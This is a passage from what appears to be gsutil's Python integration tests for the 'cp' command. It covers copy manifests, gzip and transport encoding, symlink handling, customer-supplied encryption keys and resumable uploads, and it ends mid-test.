logpath = self.CreateTempFile(file_name=manifest_name, contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(['cp', '-L', logpath, fpath, dsturi])
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY2:
lines = [six.text_type(line, UTF8) for line in lines]
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
results = dict(zip(expected_headers, results))
self.assertEqual(
results['Source'],
'file://' + fpath,
)
self.assertEqual(
results['Destination'],
dsturi,
)
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results['Start'], date_format)
end_date = datetime.datetime.strptime(results['End'], date_format)
self.assertEqual(end_date > start_date, True)
if self.RunGsUtil == testcase.GsUtilIntegrationTestCase.RunGsUtil:
# Check that we didn't do automatic parallel uploads - compose doesn't
# calculate the MD5 hash. Since RunGsUtil is overriden in
# TestCpParallelUploads to force parallel uploads, we can check which
# method was used.
self.assertEqual(results['Md5'], 'rL0Y20zC+Fzt72VPzMSk2A==')
self.assertEqual(int(results['Source Size']), 3)
self.assertEqual(int(results['Bytes Transferred']), 3)
self.assertEqual(results['Result'], 'OK')
@SequentialAndParallelTransfer
def test_cp_manifest_download(self):
"""Tests downloading with a manifest file."""
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'')
logpath = self.CreateTempFile(contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(
['cp', '-L', logpath, suri(key_uri), fpath], return_stdout=True)
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY3:
decode_lines = []
for line in lines:
if line.startswith("b'"):
some_strs = line.split(',')
line_parts = []
for some_str in some_strs:
if some_str.startswith("b'"):
line_parts.append(ast.literal_eval(some_str).decode(UTF8))
else:
line_parts.append(some_str)
decode_lines.append(','.join(line_parts))
else:
decode_lines.append(line)
lines = decode_lines
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
self.assertEqual(results[0][:5], '%s://' % self.default_provider) # source
self.assertEqual(results[1][:7], 'file://') # destination
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results[2], date_format)
end_date = datetime.datetime.strptime(results[3], date_format)
self.assertEqual(end_date > start_date, True)
self.assertEqual(int(results[6]), 3) # Source Size
# Bytes transferred might be more than 3 if the file was gzipped, since
# the minimum gzip header is 10 bytes.
self.assertGreaterEqual(int(results[7]), 3) # Bytes Transferred
self.assertEqual(results[8], 'OK') # Result
@SequentialAndParallelTransfer
def test_copy_unicode_non_ascii_filename(self):
key_uri = self.CreateObject()
# Try with and without resumable upload threshold, to ensure that each
# scenario works. In particular, resumable uploads have tracker filename
# logic.
file_contents = b'x' * START_CALLBACK_PER_BYTES * 2
fpath = self.CreateTempFile(file_name='Аудиоархив', contents=file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', '1')]):
# fpath_bytes = fpath.encode(UTF8)
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)],
return_stdout=True,
force_gsutil=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold',
str(START_CALLBACK_PER_BYTES * 3))]):
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)],
return_stdout=True,
force_gsutil=True)
self.assertEquals(stdout.encode('ascii'), file_contents)
# Note: We originally one time implemented a test
# (test_copy_invalid_unicode_filename) that invalid unicode filenames were
# skipped, but it turns out os.walk() on macOS doesn't have problems with
# such files (so, failed that test). Given that, we decided to remove the
# test.
@SequentialAndParallelTransfer
def test_gzip_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
# Test that copying specifying only 2 of the 3 prefixes gzips the correct
# files, and test that including whitespace in the extension list works.
self.RunGsUtil([
'cp', '-z', 'js, html',
os.path.join(tmpdir, 'test.*'),
suri(bucket_uri)
])
self.AssertNObjectsInBucket(bucket_uri, 3)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-j flag to target specific extensions.
"""
def _create_test_data(): # pylint: disable=invalid-name
"""Setup the bucket and local data to test with.
Returns:
Triplet containing the following values:
bucket_uri: String URI of cloud storage bucket to upload mock data
to.
tmpdir: String, path of a temporary directory to write mock data to.
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
"""
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uris = []
for filename in ('test.html', 'test.js', 'test.txt'):
local_uris.append(
self.CreateTempFile(file_name=filename,
tmpdir=tmpdir,
contents=contents))
return (bucket_uri, tmpdir, local_uris)
def _upload_test_data(tmpdir, bucket_uri): # pylint: disable=invalid-name
"""Upload local test data.
Args:
tmpdir: String, path of a temporary directory to write mock data to.
bucket_uri: String URI of cloud storage bucket to upload mock data to.
Returns:
stderr: String output from running the gsutil command to upload mock
data.
"""
stderr = self.RunGsUtil([
'-D', 'cp', '-j', 'js, html',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)
],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 3)
return stderr
def _assert_sent_compressed(local_uris, stderr): # pylint: disable=invalid-name
"""Ensure the correct files were marked for compression.
Args:
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
stderr: String output from running the gsutil command to upload mock
data.
"""
local_uri_html, local_uri_js, local_uri_txt = local_uris
assert_base_string = 'Using compressed transport encoding for file://{}.'
self.assertIn(assert_base_string.format(local_uri_html), stderr)
self.assertIn(assert_base_string.format(local_uri_js), stderr)
self.assertNotIn(assert_base_string.format(local_uri_txt), stderr)
def _assert_stored_uncompressed(bucket_uri, contents=b'x' * 10000): # pylint: disable=invalid-name
"""Ensure the files are not compressed when they are stored in the bucket.
Args:
bucket_uri: String with URI for bucket containing uploaded test data.
contents: Byte string that are stored in each file in the bucket.
"""
local_uri_html = suri(bucket_uri, 'test.html')
local_uri_js = suri(bucket_uri, 'test.js')
local_uri_txt = suri(bucket_uri, 'test.txt')
fpath4 = self.CreateTempFile()
for uri in (local_uri_html, local_uri_js, local_uri_txt):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
# Get mock data, run tests
bucket_uri, tmpdir, local_uris = _create_test_data()
stderr = _upload_test_data(tmpdir, bucket_uri)
_assert_sent_compressed(local_uris, stderr)
_assert_stored_uncompressed(bucket_uri)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_non_resumable(self):
"""Test non resumable, gzip encoded files upload correctly in parallel.
This test generates a small amount of data (e.g. 100 chars) to upload.
Due to the small size, it will be below the resumable threshold,
and test the behavior of non-resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 100
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_resumable(self):
"""Test resumable, gzip encoded files upload correctly in parallel.
This test generates a large amount of data (e.g. halt_size amount of chars)
to upload. Due to the large size, it will be above the resumable threshold,
and test the behavior of resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SequentialAndParallelTransfer
def test_gzip_all_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test', tmpdir=tmpdir, contents=contents)
# Test that all files are compressed.
self.RunGsUtil(
['cp', '-Z',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, 4)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
uri4 = suri(bucket_uri, 'test')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri4], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3, uri4):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_all_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-J flag to target all files.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uri1 = self.CreateTempFile(file_name='test.txt',
tmpdir=tmpdir,
contents=contents)
local_uri2 = self.CreateTempFile(file_name='test',
tmpdir=tmpdir,
contents=contents)
# Upload the data.
stderr = self.RunGsUtil(
['-D', 'cp', '-J',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 2)
# Ensure the correct files were marked for compression.
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri1),
stderr)
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri2),
stderr)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
remote_uri1 = suri(bucket_uri, 'test.txt')
remote_uri2 = suri(bucket_uri, 'test')
fpath4 = self.CreateTempFile()
for uri in (remote_uri1, remote_uri2):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
def test_both_gzip_options_error(self):
"""Test that mixing compression flags error."""
cases = (
# Test with -Z and -z
['cp', '-Z', '-z', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-z', 'html, js', '-Z', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -z and -Z options together is invalid.', stderr)
def test_both_gzip_transport_encoding_options_error(self):
"""Test that mixing transport encoding flags error."""
cases = (
# Test with -J and -j
['cp', '-J', '-j', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-j', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j and -J options together is invalid.', stderr)
def test_combined_gzip_options_error(self):
"""Test that mixing transport encoding and compression flags error."""
cases = (['cp', '-Z', '-j', 'html, js', 'a.js',
'b.js'], ['cp', '-J', '-z', 'html, js', 'a.js',
'b.js'], ['cp', '-j', 'html, js', '-Z', 'a.js', 'b.js'],
['cp', '-z', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j/-J and -z/-Z options together is invalid.',
stderr)
def test_upload_with_subdir_and_unexpanded_wildcard(self):
fpath1 = self.CreateTempFile(file_name=('tmp', 'x', 'y', 'z'))
bucket_uri = self.CreateBucket()
wildcard_uri = '%s*' % fpath1[:-5]
stderr = self.RunGsUtil(
['cp', '-R', wildcard_uri, suri(bucket_uri)], return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
def test_upload_does_not_raise_with_content_md5_and_check_hashes_never(self):
fpath1 = self.CreateTempFile(file_name=('foo'))
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
stderr = self.RunGsUtil(
['-h', 'Content-MD5: invalid-md5', 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
@SequentialAndParallelTransfer
def test_cp_object_ending_with_slash(self):
"""Tests that cp works with object names ending with slash."""
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/',
contents=b'dir')
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/def',
contents=b'def')
self.AssertNObjectsInBucket(bucket_uri, 2)
self.RunGsUtil(['cp', '-R', suri(bucket_uri), tmpdir])
# Check that files in the subdir got copied even though subdir object
# download was skipped.
with open(os.path.join(tmpdir, bucket_uri.bucket_name, 'abc', 'def')) as f:
self.assertEquals('def', '\n'.join(f.readlines()))
def test_cp_without_read_access(self):
"""Tests that cp fails without read access to the object."""
# TODO: With 401's triggering retries in apitools, this test will take
# a long time. Ideally, make apitools accept a num_retries config for this
# until we stop retrying the 401's.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Use @Retry as hedge against bucket listing eventual consistency.
self.AssertNObjectsInBucket(bucket_uri, 1)
if self.default_provider == 's3':
expected_error_regex = r'AccessDenied'
else:
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(['cp', suri(object_uri), 'foo'],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_r_minus_e(self):
"""Tests that cp -e -r ignores symlinks when recursing."""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
# Create a valid file, since cp expects to copy at least one source URL
# successfully.
self.CreateTempFile(tmpdir=tmpdir, contents=b'foo')
subdir = os.path.join(tmpdir, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(tmpdir, 'missing'))
# Create a blank directory that is a broken symlink to ensure that we
# don't fail recursive enumeration with a bad symlink.
os.symlink(os.path.join(tmpdir, 'missing'), os.path.join(subdir, 'missing'))
os.rmdir(os.path.join(tmpdir, 'missing'))
self.RunGsUtil(['cp', '-r', '-e', tmpdir, suri(bucket_uri)])
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_e(self):
fpath_dir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=fpath_dir)
fpath2 = os.path.join(fpath_dir, 'cp_minus_e')
bucket_uri = self.CreateBucket()
os.symlink(fpath1, fpath2)
# We also use -c to continue on errors. One of the expanded glob entries
# should be the symlinked file, which should throw a CommandException since
# no valid (non-symlinked) files could be found at that path; we don't want
# the command to terminate if that's the first file we attempt to copy.
stderr = self.RunGsUtil([
'-m', 'cp', '-e',
'%s%s*' % (fpath_dir, os.path.sep),
suri(bucket_uri, 'files')
],
return_stderr=True)
self.assertIn('Copying file', stderr)
if self._use_gcloud_storage:
self.assertIn('Skipping symlink', stderr)
else:
self.assertIn('Skipping symbolic link', stderr)
# Ensure that top-level arguments are ignored if they are symlinks. The file
# at fpath1 should be successfully copied, then copying the symlink at
# fpath2 should fail.
stderr = self.RunGsUtil(
['cp', '-e', '-r', fpath1, fpath2,
suri(bucket_uri, 'files')],
return_stderr=True,
expected_status=1)
self.assertIn('Copying file', stderr)
if self._use_gcloud_storage:
self.assertIn('Skipping symlink', stderr)
self.assertIn('URL matched no objects or files: %s' % fpath2, stderr)
else:
self.assertIn('Skipping symbolic link', stderr)
self.assertIn('CommandException: No URLs matched: %s' % fpath2, stderr)
def test_cp_multithreaded_wildcard(self):
"""Tests that cp -m works with a wildcard."""
num_test_files = 5
tmp_dir = self.CreateTempDir(test_files=num_test_files)
bucket_uri = self.CreateBucket()
wildcard_uri = '%s%s*' % (tmp_dir, os.sep)
self.RunGsUtil(['-m', 'cp', wildcard_uri, suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, num_test_files)
@SequentialAndParallelTransfer
def test_cp_duplicate_source_args(self):
"""Tests that cp -m works when a source argument is provided twice."""
object_contents = b'edge'
object_uri = self.CreateObject(object_name='foo', contents=object_contents)
tmp_dir = self.CreateTempDir()
self.RunGsUtil(['-m', 'cp', suri(object_uri), suri(object_uri), tmp_dir])
with open(os.path.join(tmp_dir, 'foo'), 'rb') as in_fp:
contents = in_fp.read()
# Contents should be not duplicated.
self.assertEqual(contents, object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object(self):
"""Tests downloading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath)])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), object_contents)
# If multiple keys are supplied and one is correct, download should succeed.
fpath2 = self.CreateTempFile()
boto_config_for_test2 = [
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY3),
('GSUtil', 'decryption_key1', TEST_ENCRYPTION_KEY2),
('GSUtil', 'decryption_key2', TEST_ENCRYPTION_KEY1)
]
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object_without_key(self):
"""Tests downloading an encrypted object without the necessary key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)],
expected_status=1,
return_stderr=True)
self.assertIn(
'Missing decryption key with SHA256 hash %s' %
TEST_ENCRYPTION_KEY1_SHA256_B64, stderr)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_upload_encrypted_object(self):
"""Tests uploading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri = suri(bucket_uri, 'foo')
file_contents = b'bar'
fpath = self.CreateTempFile(contents=file_contents, file_name='foo')
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
# Uploading the object should succeed.
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(fpath), suri(bucket_uri)])
self.AssertObjectUsesCSEK(object_uri, TEST_ENCRYPTION_KEY1)
with SetBotoConfigForTest(boto_config_for_test):
# Reading the object back should succeed.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), file_contents)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_break(self):
"""Tests that an encrypted upload resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
with open(fpath, 'rb') as fp:
self.assertIn(CalculateB64EncodedMd5FromContents(fp), stdout)
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_different_key(self):
"""Tests that an encrypted upload resume uses original encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload with multiple keys, including the original.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY2),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Object should have the original key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_missing_key(self):
"""Tests that an encrypted upload does not resume without original key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload without the original key.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertNotIn('Resuming upload', stderr)
self.assertIn('does not match current encryption key', stderr)
self.assertIn('Restarting upload from scratch', stderr)
# Object should have the new key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY2)
def _ensure_object_unencrypted(self, object_uri_str):
"""Strongly consistent check that the object is unencrypted."""
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
self.assertNotIn('Encryption Key', stdout)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break(self):
"""Tests that an upload can be resumed after a connection break."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_resumable_upload_gzip_encoded_break(self):
"""Tests that a gzip encoded upload can be resumed."""
# Setup the bucket and local data. File contents are randomized to prevent
# them from compressing below the resumable-threshold and failing the test.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
local_uri = self.CreateTempFile(file_name='test.txt', contents=contents)
# Configure boto
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '-J', '--testcallbackfile', test_callback_file, local_uri,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['-D', 'cp', '-J', local_uri,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Ensure the progress logger is still seeing a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
temp_uri = self.CreateTempFile()
remote_uri = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', remote_uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', remote_uri, suri(temp_uri)])
with open(temp_uri, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_retry(self):
"""Tests that a resumable upload completes with one retry."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
# TODO: Raising an httplib or socket error blocks bucket teardown
# in JSON for 60-120s on a multiprocessing lock acquire. Figure out why;
# until then, raise an apitools retryable exception.
if self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, http_client.BadStatusLine, (
'unused',))))
else:
